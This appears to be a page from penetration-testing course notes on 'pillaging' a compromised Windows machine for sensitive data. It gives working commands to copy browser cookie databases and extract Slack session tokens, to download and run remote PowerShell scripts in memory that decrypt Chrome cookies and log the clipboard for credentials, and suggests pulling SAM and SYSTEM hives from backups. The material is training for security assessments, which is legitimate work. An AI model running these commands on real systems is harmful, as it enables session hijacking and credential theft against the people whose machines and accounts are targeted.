Pillaging

Pillaging is the process of obtaining information from a compromised system. It can be personal information, corporate blueprints, credit card data, server information, infrastructure and network details, passwords, or other types of credentials, and anything relevant to the company or security assessment we are working on.

Here is a list of data sources to look for when pillaging:

Installed applications
Installed services
- Websites
- File Shares
- Databases
- Directory Services (such as Active Directory, Azure AD, etc.)
- Name Servers
- Deployment Services
- Certificate Authority
- Source Code Management Server
- Virtualization
- Messaging
- Monitoring and Logging Systems
- Backups
Sensitive Data
- Keylogging
- Screen Capture
- Network Traffic Capture
- Previous Audit reports
User Information
- History files, interesting documents (.doc/x,.xls/x,password./pass., etc)
- Roles and Privileges
- Web Browsers
- IM Clients

Installed Applications

Via cmd:

dir "C:\Program Files"

Via Powershell & Registry Keys:

PS C:\hacker> $INSTALLED = Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* |  Select-Object DisplayName, DisplayVersion, InstallLocation
PS C:\hacker> $INSTALLED += Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, InstallLocation
PS C:\hacker> $INSTALLED | ?{ $_.DisplayName -ne $null } | sort-object -Property DisplayName -Unique | Format-Table -AutoSize

Abusing Cookies to access IM Clients

Let's focus on Slack.

There's a tool called SlackExtract released in 2018, which was able to extract Slack messages. It used the cookie named d, which Slack uses to store the user's authentication token.

We can also attempt to steal the cookie from the web browser.

Firefox

Firefox saves the cookies in an SQLite database in a file named cookies.sqlite.

copy $env:APPDATA\Mozilla\Firefox\Profiles\*.default-release\cookies.sqlite .

Then we can use the Python script cookieextractor.py to extract cookies from the Firefox cookies.SQLite database.

python3 cookieextractor.py --dbpath "/home/plaintext/cookies.sqlite" --host slack --cookie d

Finally we can import the cookie in our web browser using Cookie-Editor

Chrome & Chromium based browsers

Chromium-based browsers also stores their cookies information in an SQLite database. The only difference is that the cookie value is encrypted with Data Protection API (DPAPI).

NET provides access to the data protection API (DPAPI), which allows you to encrypt data using information from the current user account or computer. When you use the DPAPI, you alleviate the difficult problem of explicitly generating and storing a cryptographic key.

To get the cookie value, we'll need to perform a decryption routine from the session of the user we compromised.

SharpChromium does what we need. It connects to the current user SQLite cookie database, decrypts the cookie value, and presents the result in JSON format.

We use Invoke-SharpChromium, a PowerShell script created by S3cur3Th1sSh1t which uses reflection to load SharpChromium:

PS C:\hacker> IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSh
arpPack/master/PowerSharpBinaries/Invoke-SharpChromium.ps1')
PS C:\hacker> Invoke-SharpChromium -Command "cookies slack.com"

If we get an error with the last command refer to => https://academy.hackthebox.com/module/67/section/1637 at "We got an error because the cookie file path"

Clipboard

We can use the Invoke-Clipboard script to extract user clipboard data.

PS C:\hacker> IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/inguardians/Invoke-Clipboard/master/Invoke-Clipboard.ps1')
PS C:\hacker> Invoke-ClipboardLogger

If we wait at some point we will see credentials

Backup Services

If we get access to backup tools such as restic we can use it to backup the entire filesystem or access an existing backup to look for sensitive info such as password hashes in the SAM and SYSTEM hives.

PreviousInteracting with Users NextMisc Techniques

Last updated 2 years ago